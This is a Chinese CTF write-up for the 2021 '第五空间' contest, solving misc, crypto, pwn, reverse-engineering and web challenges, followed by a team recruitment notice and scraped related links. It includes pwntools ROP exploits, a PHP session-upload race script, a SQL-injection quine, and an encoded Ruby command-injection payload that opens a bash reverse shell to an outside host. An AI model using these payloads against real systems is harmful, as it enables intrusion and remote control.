EDI安全
EDI安全

2021 第五空间 ctf wp

2021 第五空间 ctf wp

  • Misc
    • 签到题
    • alpha10
    • BabyMi
  • Crypto
    • ECC
  • PWN
    • bountyhunter
    • CrazyVM
  • RE
    • uniapp
  • Web
    • EasyCleanup
    • pklovecloud
    • PNG图⽚转换器
    • WebFTP
    • yet_another_mysql_injection
  • Tip

Misc

签到题

2021 第五空间 ctf wp_第1张图片

alpha10

分离得到两个图⽚,⼀个jpg⼀个png,
两张图⼀样,想到可能是盲⽔印,

https://github.com/chishaxie/BlindWaterMark.git

⽤脚本解密
在这里插入图片描述
得到盲⽔印

看不清楚,⽤在线ps调了个颜⾊
2021 第五空间 ctf wp_第2张图片flag{XqAe3QzK2ehD5fWv8jfBitPqHUw0}

BabyMi

先将流量包中usb数据导出
2021 第五空间 ctf wp_第3张图片
解了⼀下16进制数据 发现了⼀些磁盘结构,写脚本转为磁盘⽂件

from binascii import unhexlify
f=open("1.txt","r")
diskfile=f.readlines()
filecode=""
for a in diskfile:
 if len(a) !=1:
 filecode+=unhexlify(a[:-1])
g=open("disk","wb")
g.write(filecode)

⽤r-studio去扫描磁盘找到⼀个 mp4
2021 第五空间 ctf wp_第4张图片
flag在mp4中
2021 第五空间 ctf wp_第5张图片

Crypto

ECC

第⼀部分,直接在sage⾥⾯⽤离散对数进⾏求解就可以出 第⼆部分参考 cnhongke的exp,可以把P的阶分解成⼏个
⼩的质数和⼀个⼤数,⼤数⾜够⼤,所以可以⽤中国剩余定理解出来前⼏个,然后对最后⼀个⼤数 算⼀下范围,
再解⼀个新的ecdlp就可以 第三部分是⽤点p的阶是p在⽹上找了个SmartAttack就出了
exp

from Crypto.Util.number import *
p = 146808027458411567
A = 46056180
B = 2316783294673
E = EllipticCurve(GF(p), [A, B])
P = E(119851377153561800, 50725039619018388, 1)
Q = E(22306318711744209, 111808951703508717, 1)
print(long_to_bytes(discrete_log(Q, P, operation='+')))
p = 1256438680873352167711863680253958927079458741172412327087203
A = 377999945830334462584412960368612
B = 604811648267717218711247799143415167229480
E = EllipticCurve(GF(p),[A,B])
P = E(550637390822762334900354060650869238926454800955557622817950,
 700751312208881169841494663466728684704743091638451132521079, 1)
Q = E(1152079922659509908913443110457333432642379532625238229329830,
 819973744403969324837069647827669815566569448190043645544592, 1)
factors = [i[0] ^ i[1] for i in P.order().factor()][:-1]
t = [P.order() // i for i in factors]
a = [discrete_log(t[i] * Q, t[i] * P, factors[i], operation='+') for i in range(len(factors))]
a = crt(a, factors)
mod = 1
for i in factors:
 mod *= i
k = bsgs(m * P, Q - a * P, ((2 ^ 55) // m, (2 ^ 56) // m), operation='+')
key = a + k * mod
print(long_to_bytes(key))
p=
0xd3ceec4c84af8fa5f3e9af91e00cabacaaaecec3da619400e29a25abececfdc9bd678e2708a58acb1bd15370acc39
c596807dab6229dca11fd3a217510258d1b
A =
0x95fc77eb3119991a0022168c83eee7178e6c3eeaf75e0fdf1853b8ef4cb97a9058c271ee193b8b27938a07052f918
c35eccb027b0b168b4e2566b247b91dc07
B =
0x926b0e42376d112ca971569a8d3b3eda12172dfb4929aea13da7f10fb81f3b96bf1e28b4a396a1fcf38d80b463582
e45d06a548e0dc0d567fc668bd119c346b2
E = EllipticCurve(GF(p), [A, B])
P =
(1012157144319191307273257283149053462081083530689263455553265769625550689896053695556854478233
7611042739846570602400973952350443413585203452769205144937861 ,
84252185824670777304098379450835713627453883280439305118651748474367989903971248043579825650559
18658197831123970115905304092351218676660067914209199149610)
P = E(P)
Q =
(9648640091422371373413896537561659355426111535766413706397293045706497490048109806724153069771
94223081235401355646820597987366171212332294914445469010927 ,
51621857805117832784493425292699704537342484603029084555208319503433711475666825305831605742175
43701164101226640565768860451999819324219344705421407572537)
Q = E(Q)
def _lift(curve, point, gf):
 x, y = map(ZZ, point.xy())
 for point_ in curve.lift_x(x, all=True):
 x_, y_ = map(gf, point_.xy())
 if y == y_:
 return point_
def attack(base, multiplication_result):
 curve = base.curve()
 gf = curve.base_ring()
 p = gf.order()
assert curve.trace_of_frobenius() == 1, f"Curve should have trace of Frobenius = 1."
 lift_curve = EllipticCurve(Qp(p), list(map(lambda a: int(a) + p * ZZ.random_element(1, p),
curve.a_invariants())))
 lifted_base = p * _lift(lift_curve, base, gf)
 lifted_multiplication_result = p * _lift(lift_curve, multiplication_result, gf)
 lb_x, lb_y = lifted_base.xy()
 lmr_x, lmr_y = lifted_multiplication_result.xy()
 return int(gf((lmr_x / lmr_y) / (lb_x / lb_y)))
print(long_to_bytes(attack(P,Q)))

PWN

bountyhunter

from pwn import *
io = process("./bountyhunter")
if args.R:
 io = remote("139.9.123.168",32548)
elf = ELF("./bountyhunter")
sh = 0x0000000000403408
pop_rdi = 0x000000000040120b
payload = "A" * 0x90 +p64(0x1) + p64(pop_rdi) + p64(sh) + p64(elf.symbols['system'])
io.sendline(payload)
io.interactive()

flag{GXaaWi8DWieSxP4IeOlLCSWLTe0G}

CrazyVM

#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./CrazyVM'
#context.arch='amd64'
while True :
 # try :
 elf=ELF(elfelf)
 context.arch=elf.arch
 if len(sys.argv)==1 :
 clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
 io=process(elfelf)
 # io=process(['./'],env={'LD_PRELOAD':'./'})
 clibc.srand(clibc.time(0))
 libc=ELF('/usr/lib/freelibs/amd64/2.31/libc.so.6')
 ld = ELF('/glibc/x64/2.31/lib/ld-2.31.so')
 one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
 else :
 clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
 io=remote('114.115.221.217',49153)
 clibc.srand(clibc.time(0))
 libc=ELF('./libc.so.6e')
 # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
 one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
 def op(a,b,c,d,e):
 return p8(a)+p8(b)+p8(c)+p8(d)+p32(e)
 gdb_code='''
 telescope $rebase(0x202040) 16
 b *$rebase(0xb6c3)
 '''
 io.recv()
 pay=op(1,1,2,2,0x6873)
 pay+=op(0x12,4,3,0x10,0)
 pay+=op(0x13,4,3,0x3,0)
 pay+=op(1,1,2,4,0x322ff0+0x18+0x20-0x80000)
 pay+=op(2,0,3,3,4)
 pay+=op(0x12,4,3,0x3,0)
 pay+=op(0x13,4,3,0x10,0)
 pay+=op(0x13,4,3,0x5,0)
 bin_sh_addr=libc.search('/bin/sh\x00').next()
system_addr=libc.sym['system']
 calloc_addr=libc.sym['__libc_calloc']
 offset1=bin_sh_addr-calloc_addr
 offset2=bin_sh_addr-system_addr
 pay+=op(1,1,2,6,offset1)
 pay+=op(2,0,3,5,6)
 pay+=op(1,1,2,4,2312+0x40-8)
 pay+=op(2,0,3,3,4)
 pay+=op(1,0,3,0x10,3)
 pay+=op(0x12,4,3,0x2,0)
 pay+=op(1,1,2,6,offset2)
 pay+=op(3,0,3,5,6)
 pay+=op(1,1,2,4,1536)
 pay+=op(2,0,3,3,4)
 pay+=op(1,0,3,0x10,3)
 pay+=op(0x12,4,3,0x5,0)
 pay+=op(0x13,4,3,0x5,0)
 # pay+='aaaaa'
 io.send(pay)
 io.recv()
 pay='1'
 # gdb.attach(io,gdb_code)
 io.send(pay)
 # libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-88-0x10
 # libc.address=libc_base
 # bin_sh_addr=libc.search('/bin/sh\x00').next()
 # system_addr=libc.sym['system']
 # free_hook_addr=libc.sym['__free_hook']
 # success('libc_base:'+hex(libc_base))
 # success('heap_base:'+hex(heap_base))
 io.interactive()
 # except Exception as e:
 # io.close()
 # continue
 # else:
 # continue

RE

uniapp

js ,主要逻辑在uniapp.zip\assets\appsUNI14D1880\www\app-service.js⾥⾯
⾥⾯得代码很简单 就是需要整理,主要解密脚本就是看

"use strict";
 var r = function (t, e, n) {
 if (
 ("undefined" === typeof n && (n = 0),
 !(t instanceof Uint8Array) || 32 !== t.length)
 )
 throw new Error("Key should be 32 byte array!");
if (!(e instanceof Uint8Array) || 12 !== e.length)
 throw new Error("Nonce should be 12 byte array!");
 (this._rounds = 20),
 (this._sigma = [1634760805, 857760878, 2036477234, 1797285236]),
 (this._param = [
 this._sigma[0],
 this._sigma[1],
 this._sigma[2],
 this._sigma[3],
 this._get32(t, 0),
 this._get32(t, 4),
 this._get32(t, 8),
 this._get32(t, 12),
 this._get32(t, 16),
 this._get32(t, 20),
 this._get32(t, 24),
 this._get32(t, 28),
 n,
 this._get32(e, 0),
 this._get32(e, 4),
 this._get32(e, 8),
 ]),
 (this._keystream = [
 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
 ]),
 (this._byteCounter = 0);
 };
 (r.prototype._chacha = function () {
 var t = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
 e = 0,
 n = 0;
 for (e = 0; e < 16; e++) t[e] = this._param[e];
 for (e = 0; e < this._rounds; e += 2)
 this._quarterround(t, 0, 4, 8, 12),
 this._quarterround(t, 1, 5, 9, 13),
 this._quarterround(t, 2, 6, 10, 14),
 this._quarterround(t, 3, 7, 11, 15),
 this._quarterround(t, 0, 5, 10, 15),
 this._quarterround(t, 1, 6, 11, 12),
 this._quarterround(t, 2, 7, 8, 13),
 this._quarterround(t, 3, 4, 9, 14);
 for (e = 0; e < 16; e++)
 (t[e] += this._param[e]),
 (this._keystream[n++] = 255 & t[e]),
 (this._keystream[n++] = (t[e] >>> 8) & 255),
 (this._keystream[n++] = (t[e] >>> 16) & 255),
 (this._keystream[n++] = (t[e] >>> 24) & 255);
 }),
 (r.prototype._quarterround = function (t, e, n, r, o) {
 (t[o] = this._rotl(t[o] ^ (t[e] += t[n]), 16)),
(t[n] = this._rotl(t[n] ^ (t[r] += t[o]), 12)),
 (t[o] = this._rotl(t[o] ^ (t[e] += t[n]), 8)),
 (t[n] = this._rotl(t[n] ^ (t[r] += t[o]), 7)),
 (t[e] >>>= 0),
 (t[n] >>>= 0),
 (t[r] >>>= 0),
 (t[o] >>>= 0);
 }),
 (r.prototype._get32 = function (t, e) {
 return t[e++] ^ (t[e++] << 8) ^ (t[e++] << 16) ^ (t[e] << 24);
 }),
 (r.prototype._rotl = function (t, e) {
 return (t << e) | (t >>> (32 - e));
 }),
 (r.prototype.encrypt = function (t) {
 return this._update(t);
 }),
 (r.prototype.decrypt = function (t) {
 return this._update(t);
 }),
 (r.prototype._update = function (t) {
 if (!(t instanceof Uint8Array) || 0 === t.length)
 throw new Error(
 "Data should be type of bytes (Uint8Array) and not empty!"
 );
 for (var e = new Uint8Array(t.length), n = 0; n < t.length; n++)
 (0 !== this._byteCounter && 64 !== this._byteCounter) ||
 (this._chacha(), this._param[12]++, (this._byteCounter = 0)),
 (e[n] = t[n] ^ this._keystream[this._byteCounter++]);
 return e;
 })

然后调⽤,传⼊这⾥的数组就能解出flag

var c = new Uint8Array(u),
 f = new r.default(i, a, s),
 l = f["encrypt"](c),
 p = [
 34, 69, 86, 242, 93, 72, 134, 226, 42, 138, 112, 56, 189, 53,
 77, 178, 223, 76, 78, 221, 63, 40, 86, 231, 121, 29, 154, 189,
 204, 243, 205, 44, 141, 100, 13, 164, 35, 123,
 ];

Web

EasyCleanup

开启了session.upload
2021 第五空间 ctf wp_第6张图片
脚本

import threading
import requests
import io
thread_num = 100
thread_list = []
stop_threads = False
def run(s):
 global stop_threads
 while True:
 if stop_threads:
 break
 f = io.BytesIO(b'a' * 1024 * 50)
 url = 'http://114.115.134.72:32770/?file=/tmp/sess_1'
 headers = {'Cookie': 'PHPSESSID=1', }
 data = {"PHP_SESSION_UPLOAD_PROGRESS": ""} #
Payload
 files = {"file": ('exp.txt', f)}
 r = s.post(url, headers=headers, data=data, files=files)
 if 'suanve' in r.text:
 print(r.text)
 stop_threads = True
 exit(0)
if __name__ == '__main__':
 with requests.session() as s:
 while thread_num:
 t = threading.Thread(target=run, args=(s,))
 thread_num -= 1
 t.start()
 thread_list.append(t)
 for t in thread_list:
 t.join()

2021 第五空间 ctf wp_第7张图片

pklovecloud

 
class pkshow
{
 function __construct($s)
 { 
 $this->nova = $s;
 } 
}
class acp
{ 
 function __construct()
 { 
 $this->cinder = new ace;
 } 
} 
class ace
{ 
 public $filename; 
 public $openstack;
 public $docker;
 function __construct()
 {
 $this->openstack = new pkshow("asd");
 $this->filename = "flag.php";
 }
 function echo_name() 
 { 
$this->openstack = unserialize($this->docker);
 $this->openstack->neutron = $heat;
 if($this->openstack->neutron === $this->openstack->nova)
 {
 $file = "./{$this->filename}";
 if (file_get_contents($file)) 
 { 
 return file_get_contents($file);
 } 
 else
 {
 return "keystone lost~";
 } 
 }
 } 
} 
$a = new acp();
echo serialize($a);

2021 第五空间 ctf wp_第8张图片

PNG图⽚转换器

2021 第五空间 ctf wp_第9张图片
ruby的open函数存在命令注⼊反弹shell

POST /convert HTTP/1.1
Host: 114.115.128.215:32770
User-Agent: Mozilla/5.0 (Linux; Android 11; Z832 Build/MMB29M) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 211
Origin: http://114.115.128.215:32770
Connection: close
Referer: http://114.115.128.215:32770/convert
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 202.146.216.7
X-Originating-IP: 202.146.216.7
X-Remote-IP: 202.146.216.7
X-Remote-Addr: 202.146.216.7
file=|echo
%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%7a%4e%69%34%7
9%4e%54%55%75%4d%6a%49%78%4c%6a%45%31%4e%69%38%35%4d%44%6b%77%49%44%41%2b%4a%6a%45%3d|base64 -
d|bash;.png

2021 第五空间 ctf wp_第10张图片

WebFTP

搜索到github项⽬

https://github.com/wifeat/WebFTP

2021 第五空间 ctf wp_第11张图片
在phpinfo中发现flag
2021 第五空间 ctf wp_第12张图片

yet_another_mysql_injection

https://www.shysecurity.com/post/20140705-SQLi-Quine

2021 第五空间 ctf wp_第13张图片
$被过滤了 换⼀个符号替代就好

username=admin&password='UNION(SELECT(REPLACE(REPLACE('"UNION(SELECT(REPLACE(REPLACE("?",
CHAR(34),CHAR(39)),CHAR(63),"?")))#',CHAR(34),CHAR(39)),CHAR(63),'"UNION(SELECT(REPLACE(RE
PLACE("?",CHAR(34),CHAR(39)),CHAR(63),"?")))#')))#

2021 第五空间 ctf wp_第14张图片

Tip

你是否想要加入一个安全团队
拥有更好的学习氛围?

那就加入EDI安全,这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心。

EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事,我们在为打造安全圈好的技术氛围而努力,这里绝对是你学习技术的好地方。这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心,下一个CTF大牛就是你。

欢迎各位大佬小白入驻,大家一起打CTF,一起进步。

我们在挖掘,不让你埋没!

你的加入可以给我们带来新的活力,我们同样也可以赠你无限的发展空间。

有意向的师傅请联系邮箱[email protected](带上自己的简历,简历内容包括自己的学习方向,学习经历等)

你可能感兴趣的:(CTF-Writeup,web安全,安全)

  • 基于Oracle 12c日志表瘦身方案设计与实践 逃离地球12138 oracle数据库
    基于Oracle12c日志表瘦身方案设计与实践问题背景某核心业务系统的日志表(LOG_TABLE)数据量已累计达5GB,经分析发现:未配置任何数据清理机制包含大量无效历史日志(约40%为半年前数据)全表扫描效率下降30%每日增量达50-80MB解决方案设计一、历史数据清理方案1.安全备份(必须前置)CREATETABLELOG_TABLE_BAK_202308ASSELECT*FROMLOG_TA
  • 【自学笔记】Web前端的重点知识点-持续更新 Long_poem 笔记前端
    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录Web前端知识点一、HTML基础二、CSS样式三、JavaScript基础四、前端框架与库五、前端工具与构建六、前端性能优化七、响应式设计与适配八、前端安全总结Web前端知识点一、HTML基础常用标签超链接(标签)图片(标签)表格(、、等标签)列表(无序列表、有序列表、定义列表)HTML5新特性语义化标签(、、等)音频视频(、
  • Python 中的 with open:文件操作的最佳实践 木觞清 python开发语言
    在Python中,文件操作是最常用的一项任务,无论是读取文件内容,还是将数据写入文件。传统的文件操作方式使用open()和close()函数来处理文件,但在实际开发中,我们推荐使用withopen()语句来进行文件操作。本文将详细介绍如何使用withopen()来安全、简洁、高效地进行文件操作。什么是withopen()?withopen()是Python中的上下文管理器(contextmanag
  • Golang 并发机制-5:详解syn包同步原语 梦想画家 #Golanggolang并发机制
    并发性是现代软件开发的一个基本方面,Go(也称为Golang)为并发编程提供了一组健壮的工具。Go语言中用于管理并发性的重要包之一是“sync”包。在本文中,我们将概述“sync”包,并深入研究其最重要的同步原语之一:WaitGroups.sync包概述sync包是Go中的一个标准库包,为并发编程提供同步原语。它为开发人员提供了协调和同步程序的工具,确保安全有序地执行并发任务。sync包提供的一些
  • Windows下Go语言环境搭建和使用 go语言学习基地 GO语言学习golangwindows开发语言
    简介go语言是一种开源的、语法精简的静态编程语言,它的开源社区比较庞大,应用场景非常广范。可以用于系统监控、容器技术(Docker)、大数据、存储技术、分布式系统(HyperledgerFabric)、消息系统(Kafka客户端)、服务器管理、安全工具、Web工具等。这里介绍在Linux上安装并配置go。下载go安装包到GoLang中国:https://golang.google.cn/dl/下载
  • Java后端多租户架构设计:隔离与共享策略 省赚客APP开发者@聚娃科技 java开发语言
    Java后端多租户架构设计:隔离与共享策略大家好,我是微赚淘客返利系统3.0的小编,是个冬天不穿秋裤,天冷也要风度的程序猿!多租户架构概述多租户架构允许多个租户(客户)共享相同的系统实例,同时保证租户间的数据隔离和安全性。多租户架构的挑战数据隔离:确保一个租户不能访问另一个租户的数据。性能管理:在多租户共享资源的情况下保持性能。定制化需求:满足不同租户的特定需求。隔离策略隔离策略是多租户架构中的关
  • formValidator3.5:高效表单验证插件的使用指南 BOBO爱吃菠萝
    本文还有配套的精品资源,点击获取简介:formValidator3.5是由猫冬开发的表单验证插件,它简化了表单数据验证流程,确保了数据的有效性和安全性,同时提升了用户体验。文章将全面介绍该插件的核心特性、使用方法、API文档、示例应用以及如何集成到ASP.NETWeb应用程序中。formValidator3.5提供的灵活性、易用性、丰富的验证规则、自定义错误提示和事件处理,使得开发者可以轻松应对各
  • Android二维码和条形码扫描实现指南 BOBO爱吃菠萝
    本文还有配套的精品资源,点击获取简介:本文详述了如何在Android平台上集成二维码和条形码扫描功能,重点介绍了使用Zxing、GoogleMobileVisionAPI和FirebaseMLKit这三个库的实践方法。内容包括选择合适的库、集成Zxing和使用FirebaseMLKit的具体步骤、扫描界面的设计、安全隐私保护以及性能优化等多个方面。通过本文的学习,开发者可以更好地掌握在Androi
  • 有用的知识又增加了:如何让代码全面适配 Swift 6 大熊猫侯佩 Apple开发入门Swift6结构化并发数据竞争DataRaceActor结构和类MainActor
    概述自从Swift并发模型首次引入async和await关键字以来,我就迫不及待的开始使用它们来进行异步代码的开发了。随着时间的推移,Swift并发模型变得越来越强大,它通过让Swift编译器识别潜在问题,提供了可靠的数据竞争安全保障。然而,在切换到Swift6版本后,大家面对代码中自动生成的所有警告和错误可能会显得束手无策。这里,我们将分享一些在代码库中适配Swift6严格并发模式(Strict
  • ubuntu22.04防火墙策略 lingllllove postgresql数据库
    Ubuntu22.04作为一款流行的Linux发行版,其安全性尤为重要。防火墙是保护系统免受外部威胁的关键组成部分。本文将介绍如何在Ubuntu22.04上配置和管理防火墙策略,包括使用UFW(UncomplicatedFirewall)和更为复杂的iptables。一、UFW简介UFW(UncomplicatedFirewall)是Ubuntu默认的防火墙管理工具,它简化了iptables的配置
  • 45页PPT解读集团企业数据治理总体解决方案 智慧化智能化数字化方案 方案解读馆大数据人工智能大数据治理数据治理解决方案数据治理PPT
    企业数据治理是确保数据质量、安全与高效利用的关键策略,旨在通过全链路视角,多维度地优化数据管理。面对数据存储分散、算力消耗大、数据质量参差不齐、指标口径不统一等挑战,数据治理显得尤为重要。本方案聚焦于五大核心领域:数据存储治理,优化存储结构,提升访问效率;数据算力治理,合理分配计算资源,降低能耗;数据质量治理,通过清洗、校验等手段,确保数据准确性、完整性和时效性;数据指标治理,统一指标定义与口径,
  • java 转kotlin所需要的准备 m1zu web应用javakotlin开发语言
    1.学习Kotlin的基本语法1.1Kotlin的基本数据类型Kotlin与Java类似,有基本的数据类型,如Int、String、Boolean等。需要注意的是,Kotlin的类型系统是空安全的,这意味着类型默认情况下是不可空的。1.2了解Kotlin的关键字和语法Kotlin有一些独特的关键字和语法,比如val和var用于声明变量,fun用于声明函数等。1.3学习Kotlin的函数式编程特性K
  • 多租户架构未提供统一的安全策略和框架,导致安全策略不一致 图幻未来 网络安全
    多租户架构下的网络安全分析与AI技术应用在云计算和大数据技术的快速发展背景下,多租户架构已成为企业应用的首选。多租户架构允许多个独立的应用共享同一套基础架构和资源池,从而降低了企业的运营成本。然而,多租户架构在给企业带来便利的同时,也面临着一系列安全挑战。本文将围绕多租户架构未提供统一的安全策略和框架导致安全策略不一致的问题展开分析,并探讨AI技术在网络安全领域的应用场景。一、多租户架构下的安全挑
  • Linux操作系统在emmc上的分区 FaYE_zZ linux运维网络
    让我们直接深入探讨在eMMC存储设备上设置Linux操作系统的具体细节。你即将开始一次技术奥德赛,而我将在这里引导你穿越这个迷宫。系好安全带,这将是一段狂野的旅程!创意跨领域视角想象你的eMMC存储就像一个繁忙的大都市。每个分区就像是城市中的一个专业化区域,各自承担着独特的功能。有行政区域(启动分区),居民区(根文件系统),商业区(交换空间)等等。就像在城市中一样,维护秩序并防止混乱(也就是文件系
  • php代码审计学习路线 子非鱼999 杂记php学习开发语言
    学习PHP代码审计可以帮助你识别和修复PHP应用中的安全漏洞,保护应用免受恶意攻击。以下是系统的PHP代码审计学习路线,从基础到高级逐步提升:一、基础阶段:打好编程和安全基础PHP基础学习PHP语言的基础知识,如变量、数据类型、数组、字符串处理、函数、类和对象等。学习PHP的常见操作:文件处理、会话管理、数据库操作(如MySQL)。推荐资源:PHP官方文档PHP相关学习网站(如菜鸟教程)Web安全
  • 安全见闻(3) Bulestar_xx 泷羽sec学习笔记安全网络windows
    摘要脚本程序主要讨论的是安全性问题。脚本语言因其源代码可见、可复制性高而具有脚本性质。常见的脚本语言包括:-Lua-PHP-Go-Python-JavaScript脚本语言可以编写病毒和木马,例如Python可以编写木马,PHP可以编写一句话木马。编写脚本病毒需要了解脚本语言基础和病毒构成。宏病毒(macro)可以通过工具如metasploit生成,并植入Office文件中,如Word和PPT。宏
  • 网络安全工具大合集 黑客Jack 开发语言web安全安全网络安全信号处理网络协议
    导语:这里有一份很棒的黑客工具列表可以提供给黑客,渗透测试人员,安全研究人员。它的目标是收集,分类,让你容易找到想要的工具,创建一个工具集,你可以一键检查和更新。这里有一份很棒的黑客工具列表可以提供给黑客,渗透测试人员,安全研究人员。它的目标是收集,分类,让你容易找到想要的工具,创建一个工具集,你可以一键检查和更新。你可以通过以下命令检查所有的工具:gitclone--recursivehttps
  • 网络安全最新网络安全工具大合集_remnux部署 2301_79985178 程序员web安全php安全
    Rekall–Google开发的内存分析框架.Volatility–提取易失性内存(RAM)中的样本.移动AndroidForensicToolkit–允许你从安卓手机中提取短信记录,通话记录,照片,浏览历史,以及密码。网络取证Dshell–一个网络取证分析框架.Passivedns–一个网络嗅探工具能够记录所有的DNS响应和被动DNS其他HxD–十六进制编辑工具,能够修改任意大小的硬盘二进制数据
  • 现代应用程序中基于 Cell 架构的安全防护之道 优维科技EasyOps 架构安全
    在飞速发展的软件开发领域,基于Cell的架构日益流行起来。其概念源自船舶舱壁的设计准则,即单独的水密舱室能允许故障孤立存在。通过将这个概念应用于软件,我们创建了一个架构,将应用程序划分为离散的、可管理的组件,称为单元(Cell)。各个单元能够独立运行,并借助定义清晰的接口与协议同其他单元展开通信。基于单元的技术备受青睐,原因是它能为我们带来模块化、灵活且具备可扩展性的架构。借助该技术,工程师们不仅
  • Kakfa客户端SSL访问kafka 浪漫至死不渝1 kafkassl分布式
    博主最近在做安全治理,遇到了相当多的坑,现在我进行整理,提供一个可行的kafka的SSL访问开启kafka的ssl访问1首先创建你的私钥与证书,在kafka所在的主机,运行如下命令:keytool-keystoreserver.keystore.jks-aliaslocalhost-validity365-genkey这一步会生成一个有效期为365天,别名localhost,存有你的私钥和证书的文
  • 云原生架构:构建可扩展的云端应用程序 AI天才研究院 AI大模型企业级应用开发实战Python实战大数据AI人工智能javapythonjavascriptkotlingolang架构人工智能大厂程序员硅基计算碳基计算认知计算生物计算深度学习神经网络大数据AIGCAGILLM系统架构设计软件哲学Agent程序员实现财富自由
    云原生架构:构建可扩展的云端应用程序关键词:云原生、容器技术、微服务架构、Kubernetes、服务网格、云原生安全、监控与运维、行业应用、边缘计算摘要:本文将深入探讨云原生架构的概念、原理和实践,从基础概念到具体实施步骤,全面剖析云原生技术如何助力构建可扩展的云端应用程序。文章首先介绍了云原生架构的核心要素,包括容器技术、微服务架构、服务网格等,然后详细讲解了云原生应用开发、安全性和监控与运维等
  • ElasticSearch集群搭建步骤 Asui2233 Elasticsearchelasticsearch大数据linux
    文章目录一、前言二、使用RPM安装Elasticsearch导入ElasticsearchGPG密钥从RPM存储库安装三、设置基本安全性生成证书使用TLS加密节点间通信四、为Elasticsearch加密HTTP客户端通信五、配置集群编辑elasticsearch.yml启动集群一、前言Elasticsearch是一个开源的分布式搜索和分析引擎,用于全文搜索、结构化搜索、分析和可视化大规模数据。它
  • 网络安全之云架构 南卿安全 云服务架构
    云架构的发展史阶段一:传统基础设施构建阶段背景:以前构建系统的时候,需要购买设备,租用数据中心机柜,然后搭建基础设施。特点:在这个阶段,构建系统需要购买大量的硬件设备,租用数据中心机柜,并手动搭建基础设施。这种方式不仅成本高昂,而且灵活性差,难以适应快速变化的市场需求。限制:资源利用率低,扩展性差,难以满足大规模、高并发的业务需求。阶段二:虚拟化技术阶段背景:随着处理器的不断进化,虚拟机出现了。它
  • 编程语言“鄙视链”:为何Python会处于这样的位置? 宝码香车 #话题python开发语言
    前言:哈喽,大家好,今天给大家分享一篇文章!并提供具体代码帮助大家深入理解,彻底掌握!创作不易,如果能帮助到大家或者给大家一些灵感和启发,欢迎收藏+关注哦目录编程语言“鄙视链”:为何Python会处于这样的位置?引言一、Python被视为新手友好型语言的原因(二)丰富的学习资源(三)广泛的应用领域二、Python在某些方面被“轻视”的因素(一)性能方面的局限(二)代码的安全性与保密性(三)行业传统
  • Rust编程基础教程:嵌入式开发入门 AI天才研究院 AI大模型企业级应用开发实战编程实践一天一门编程语言大数据人工智能语言模型JavaPython架构设计
    作者:禅与计算机程序设计艺术1.背景介绍Rust是一款开源、安全的系统编程语言,它支持运行在Linux、Windows和macOS操作系统上。近年来,Rust受到了越来越多的人的关注和追捧,它可以用来编写可靠和高效的代码,同时还能保证程序的内存安全。而且,它也拥有强大的生态系统,其中包括大量成熟的crate(库)。因此,Rust在嵌入式系统领域得到了广泛应用。本文将教授Rust编程知识,让读者对R
  • 网络安全、网络预警是重要课题,大屏把好第一道关 大千UI工场 web安全网络安全
    在信息技术飞速发展的今天,网络已经深度融入社会的各个层面,成为人们生活、工作不可或缺的部分。然而,网络安全问题也随之而来,网络攻击、数据泄露等事件频繁发生,给个人、企业乃至国家带来了巨大的损失和威胁。在应对这些网络安全挑战中,网络预警发挥着至关重要的作用,而大屏作为关键的技术支撑,正牢牢把好网络安全的第一道关。网络安全与网络预警的严峻形势随着数字化进程的加速,网络边界不断拓展,攻击面愈发广泛。从个
  • Python机器学习实战:人脸识别技术的实现和挑战 AI天才研究院 AI大模型企业级应用开发实战大数据AI人工智能计算科学神经计算深度学习神经网络大数据人工智能大型语言模型AIAGILLMJavaPython架构设计AgentRPA
    Python机器学习实战:人脸识别技术的实现和挑战作者:禅与计算机程序设计艺术/ZenandtheArtofComputerProgramming关键词:人脸识别技术,模型训练,多人识别,动态人脸检测,应用场景1.背景介绍1.1问题的由来随着科技的进步和互联网的普及,人脸识别技术因其在安全验证、生物特征识别、智能监控等多个领域的广泛应用而迅速崛起。从传统的门禁系统到现代的人脸支付、社交媒体的自动登
  • 非3GPP接入与TWIF bug根本写不完 5G
    上篇在介绍非3GPP接入时,提到了四种与5G核心网互通的网元,并着重对N3IWF(非授信非3GPP网络互通网元)进行了介绍,由于N3IWF是非授信的,所以需要额外通过建立IPSec隧道来保证接入的安全性。但是TWIF(授信WLAN互通网元)是可信的,所以不需要额外的保证安全性,而且TWIF针对接入的设备,是不具备5G接入能力的设备(N5CW),即不支持NAS能力,通过WI-FI来接入到核心网中的一
  • 网络安全技术深度解析与代码实践 我的运维人生 web安全网络安全运维开发技术共享
